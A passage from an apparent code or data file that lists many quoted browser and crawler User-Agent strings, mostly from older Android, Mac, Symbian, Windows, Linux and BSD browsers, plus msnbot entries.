"Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941",
"Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 ",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (PLAYSTATION 3; 1.10)",
"Mozilla/5.0 (PLAYSTATION 3; 2.00)",
"Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0",
"Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525",
"Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2",
"Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23",
"msnbot/0.11 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.0 ( http://search.msn.com/msnbot.htm)",
"msnbot/1.1 ( http://search.msn.com/msnbot.htm)",
"msnbot-media/1.1 ( http://search.msn.com/msnbot.htm)",
"NetSurf/1.2 (NetBSD; amd64)",
"Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0",
